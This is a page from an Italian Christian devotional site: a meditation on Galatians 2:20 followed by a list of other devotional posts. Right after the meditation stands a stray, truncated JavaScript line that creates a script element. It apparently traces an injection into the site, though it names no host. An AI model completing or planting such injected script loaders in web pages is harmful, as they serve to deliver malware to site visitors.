Meditazione del giorno: Crocifisso con Cristo

“Io sono stato crocifisso con Cristo” (Galati 2:20).

Il Signore Gesù Cristo compì l’opera Sua come nostro pubblico rappresentante, e la Sua morte sulla croce fu virtualmente la morte di tutto il Suo popolo. Allora tutti i Suoi santi hanno reso alla giustizia ciò che le era dovuto, avendo fatto espiazione verso la vendetta divina per tutti i loro peccati. Paolo, l’apostolo dei Gentili, si rallegrò nel pensare che come parte del popolo eletto di Cristo, anche lui era morto sulla croce in Cristo. Egli non si limitò a crederlo dottrinalmente, ma lo accettò con fiducia, riponendo la sua speranza in questo. Paolo credette che per la virtù della morte di Cristo, aveva soddisfatto la giustizia divina, e trovato riconciliazione con Dio.

Amati, che benedizione è quando l’anima può guardare alla croce di Cristo, e sentire: “sono morto; la legge mi ha ucciso, e perciò io sono libero dal suo potere, perché nella mia Certezza ho portato la maledizione, e nella persona del mio Sostituto tutto quello che la legge poteva fare, mediante la condanna, mi è stato inflitto, poiché io sono crocifisso con Cristo”.

Ma Paolo intendeva anche più di questo. Egli non credette soltanto nella morte di Cristo, riponendo fede in essa, ma sentì realmente la sua potenza che operava in lui per crocifiggere la sua vecchia natura corrotta. Quando egli vedeva i piaceri del peccato, diceva: “Non posso goderne: io sono morto ad essi”.
Tale è l’esperienza di ogni vero Cristiano. Avendo ricevuto Cristo, il credente è come definitavemente morto a questo mondo. Ma pur essendo cosciente di essere morto al mondo, egli può al tempo stesso esclamare con l’apostolo: “Ma io vivo”. Egli è realmente vivente davanti a Dio. La vita Cristiana è un enigma senza pari. Nessun uomo carnale può comprenderlo; neanche il credente stesso può farlo. Morto, eppure vivo! Crocifisso con Cristo, eppure allo stesso tempo risorto con Cristo in novità di vita! Essere unito al Salvatore sofferente e sanguinante, ed essere morto al mondo e al peccato, sono cose che rallegrano l’anima. Oh che noi possiamo vivere maggiormente in esse!
var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Meditazione del giorno

  • Meditazione del giorno: Crocifisso con Cristo
    In Devotional
    “Io sono stato crocifisso con Cristo” (Galati 2:20). Il Signore Gesù Cristo compì l’opera Sua come nostro pubblico rappresentante, e la Sua morte sulla croce fu virtualmente la morte di tutto il Suo popolo. Allora tutti i Suoi santi hanno reso alla giustizia ciò che le era dovuto, avendo fatto espiazione verso la vendetta divina per tutti i loro peccati. Paolo, l’apostolo dei Gentili, si rallegrò nel pensare che come parte del popolo eletto di Cristo, anche lui era morto sulla croce in Cristo. Egli non si limitò a crederlo dottrinalmente, ma lo accettò con fiducia, riponendo la sua speranza in questo. Paolo credette [...continua la lettura]

Post meno Recenti

  • DIOTREFE
    Chi era Diotrefe? Etimologicamente il suo nome significa «nutrito dall’Eterno » e se tale nome era stato scelto dopo la conversione, come è da supporsi, dobbiamo dedurne che in origine questo fedele doveva manifestare le caratteristiche della consacrazione. Nelle scritture facciamo la conoscenza di questo poco noto cristiano leggendo la terza breve epistola di S. Giovanni, in cui si parla di lui in termini poco lusinghieri; viene presentato come un superbo, cianciatore e odioso. […]
  • GLI OCCHI DEL CUORE
    di Jim Cymbala  –  (Pastore della Chiesa Brooklyn Tabernacle – New York)  –  E’ più probabile che si trovi un neo credente nelle montagne del Perù che capisca della Bibbia  più di un teologo con un dottorato di ricerca. Infatti, quel Peruviano privo di istruzione non solo potrebbe saperne di più della Bibbia, ma potrebbe anche conoscere il Signore in un modo che lo studente Greco o Ebreo ignorano. Ricorda, fu Gesù a gioire e dire:  “Io ti rendo lode, o Padre, Signore del cielo e della terra, perché hai nascosto queste cose ai sapienti e agli intelligenti, e le hai rivelate ai piccoli” (Luca 10:21, enfasi mia). PREGA PRIMA DI LEGGERE LA PAROLA È facile per molti di noi approcciare quotidianamente la Parola di Dio dando poco spazio allo Spirito Santo. Spesso non […]
  • Una promessa per oggi: DIO NON ABBANDONA COLORO CHE LO CERCANO
    Salmo 9:10 – Quelli che conoscono il tuo nome confideranno in te, perché, o SIGNORE, tu non abbandoni quelli che ti cercano.  –   […]
  • LE COSE LECITE
    di Roberto Bracco  –  Un servo di Dio disse: – “La parte più numerosa di coloro che naufragano nell’oceano della fede è vinta non dall’immoralità, ma dalle cose lecite.” Oggi quest’affermazione sembra una didascalia della situazione della cristianità. Le “cose lecite” sono diventate un’altra volta le catene dei credenti; i loro polsi e le loro caviglie, parliamo in metafora, sono serrati strettamente. […]
  •  IO SUPPLIRÒ QUALSIASI TUO BISOGNO, TRAMITE LE MIE ETERNE RICCHEZZE IN GESÙ CRISTO.
    Ora il mio Dio supplirà ad ogni vostro bisogno secondo le sue ricchezze in gloria, in Cristo Gesù. (Filippesi 4:19) Il nostro Dio e Padre ha promesso di soddisfare ogni nostro bisogno in base alle immense ricchezze del deposito glorioso celeste che è in Gesù Cristo.  Il nostro Dio sa di che cosa abbiamo bisogno prima ancora che abbiamo quel bisogno e si diletta a provvederci ciò che ci serve… quando ci serve. Che si tratti di una necessità fisica o spirituale, il nostro Padre celeste è un Padre che provvede per i suoi figli. In questo specifico passaggio, Paolo scrive ai Filippesi e li ringrazia per il dono che gli hanno fatto avere per aiutarlo a portare avanti il lavoro per il Regno di Dio. Paolo li incoraggia che, per come sono stati obbedienti a condividere ciò che avevano, Dio […]
  • EVITARE I PARAGONI
    Poiché noi non abbiamo il coraggio di classificarci o confrontarci con certuni che si raccomandano da sé; i quali però, misurandosi secondo la loro propria misura e paragonandosi tra di loro stessi, mancano d’intelligenza. 2 Corinti 10:12 La pubblicità è spesso orientata a far si che le persone si sforzino di guardare il meglio, essere i migliori, i migliori in assoluto. Se indossi “questa” particolare marca di vestito, le persone ti ammireranno! Prova “questa” nuova dieta e perderai quei pochi chili in più e quindi sarai più notato ed accettato. Il mondo continuamente ci dà l’impressione che dobbiamo essere qualcosa di diverso da quello che siamo. Una persona fiduciosa evita i confronti. La fiducia non è possibile fino a quando ci confrontiamo con […]

Prossimi Eventi

Dai nostri Culti